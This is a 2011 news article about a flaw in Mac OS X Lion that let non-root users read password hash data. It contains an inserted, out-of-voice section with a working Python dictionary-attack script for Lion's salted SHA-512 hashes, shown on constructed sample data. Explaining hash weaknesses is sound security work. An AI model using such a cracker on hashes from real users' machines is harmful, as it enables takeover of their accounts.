News - Written by Renai LeMay on Monday, September 26, 2011 12:36 - 29 Comments
Aussie researcher cracks OS X Lion passwords
news An Australian security expert respected for his work testing the defences of Apple software has published a method which appears to allow an attacker to break through the password defences of Cupertino's latest Mac OS X Lion operating system.
According to his LinkedIn profile, Patrick Dunstan is currently an information security specialist at the University of Adelaide, although he also works as a guest lecturer at the University of South Australia. Dunstan had previously attracted attention in late 2009 with a blog post explaining how a user who had already gained access to a Mac OS X system could extract a user’s password on that system.
In a new blog post this week — first reported by Secure Computing Magazine last week — Dunstan published an update to his technique. This time around, however, he discovered a startling new fact about Lion's security protection: according to the researcher, the redesigned authentication scheme leaves out a crucial step, which could allow remote access to user password hashes on the system.
In previous versions of Mac OS X, in order to obtain a user's password hash, an attacker would need to read what Unix-based operating systems (such as Mac OS X) call a 'shadow' file, a file which holds the hashes and can be read only by a highly privileged account such as root.
“So for all modern OS X platforms (Tiger, Leopard, Snow Leopard and Lion) each user has their own shadow file (hash database) whose data is accessible only by the root user … or at least it should be,” wrote Dunstan in his post. “It appears in the redesign of OS X Lion’s authentication scheme a critical step has been overlooked. Whilst non-root users are unable to access the shadow files directly, Lion actually provides non-root users the ability to still view password hash data.”
This means, according to the researcher, that it might be possible for an attacker to crack a user's Lion password by attacking their system through a Java app hosted online: because the hash data is readable by any non-root user, code running with the logged-in user's privileges could read it and send it off for cracking. The attack vector would still require the owner of the computer running Mac OS X to allow the Java app to run, but it is possible.
Dunstan noted that, probably because Lion had only recently been released, he could not find any major cracking software supporting Lion's password hash format, so he has published a simple script which allows users to crack the hashes themselves. It is not yet clear whether Apple is aware of the issue, but a temporary workaround allows users to secure their system by setting different permissions on a certain file.
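The kind of offline dictionary attack the article describes, as an added example that is not Dunstan's published script nor Apple's code. It assumes the Lion hash layout as later implemented by hashcat's mode 1722 ("macOS v10.7") and John the Ripper's xsha512 format: a 4-byte salt followed by SHA-512(salt || password), both hex encoded, 136 hex characters in total. The salt, password and wordlist below are constructed for the demonstration; obtaining the hash from a Lion system in the first place is not shown.

```python
import hashlib
from typing import Iterable, Optional, Tuple

# Lion (10.7) salted SHA-512 layout, as implemented by hashcat mode 1722 and
# John the Ripper's xsha512 format (assumption of this example):
#   hex(salt) || hex(SHA-512(salt || password)), with a 4-byte salt.
SALT_LEN = 4
HASH_HEX_LEN = SALT_LEN * 2 + hashlib.sha512().digest_size * 2  # 8 + 128 = 136


def lion_hash(password: str, salt: bytes) -> str:
    """Produce a Lion-style hex hash string for a password under the given salt."""
    if len(salt) != SALT_LEN:
        raise ValueError("Lion uses a %d-byte salt" % SALT_LEN)
    digest = hashlib.sha512(salt + password.encode("utf-8")).hexdigest()
    return salt.hex() + digest


def parse_lion_hash(hash_hex: str) -> Tuple[bytes, bytes]:
    """Split a 136-hex-character Lion hash into (salt, sha512 digest) bytes."""
    hash_hex = hash_hex.strip().lower()
    if len(hash_hex) != HASH_HEX_LEN:
        raise ValueError("expected %d hex characters, got %d"
                         % (HASH_HEX_LEN, len(hash_hex)))
    raw = bytes.fromhex(hash_hex)  # raises ValueError on non-hex input
    return raw[:SALT_LEN], raw[SALT_LEN:]


def crack_lion_hash(hash_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the candidate whose salted SHA-512 matches, else None.

    The salt is prepended to each candidate before hashing, exactly as the
    stored hash was produced, so each wordlist entry costs one SHA-512 call.
    """
    salt, digest = parse_lion_hash(hash_hex)
    for candidate in candidates:
        if hashlib.sha512(salt + candidate.encode("utf-8")).digest() == digest:
            return candidate
    return None


# Constructed sample data for the demonstration (not taken from any real system).
SAMPLE_SALT = bytes.fromhex("deadbeef")
SAMPLE_HASH = lion_hash("correcthorse", SAMPLE_SALT)
WORDLIST = ["password", "letmein", "123456", "correcthorse", "qwerty"]


def demo() -> Optional[str]:
    """Run the dictionary attack against the constructed sample hash."""
    return crack_lion_hash(SAMPLE_HASH, WORDLIST)


if __name__ == "__main__":
    print("sample hash:", SAMPLE_HASH)
    print("recovered password:", demo())
```

A single unsalted-looking hex blob of 136 characters is the tell for this format; a short 4-byte salt does nothing to slow a per-hash attack like this one, it only prevents one precomputed table from serving every user on the machine.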
The news comes as Mac OS X continues to be subject to fewer security attacks than Microsoft Windows. Security researchers have stated in the past that there could be a number of reasons for the apparently stronger security of the Apple platform, ranging from its Unix basis, which allows fine-grained permissions on files and applications, to the relative dominance of Windows in the desktop PC market.
However, researchers have also speculated that attacks on Mac OS X could increase in future, along with the growing popularity of Apple's platforms, including mobile devices such as iPhones and iPads.
As this attack would likely require a user to allow an application to run on their system before it could succeed, I would regard it as less dangerous than many other security headaches out there which require no action from the user at all. What Dunstan's blog post does demonstrate, however, is that Mac OS X is not inherently safe from security problems. They exist on the Mac, and I'm sure we'll see more of them as time goes on, especially aimed at devices such as iPads.
Image credit: Apple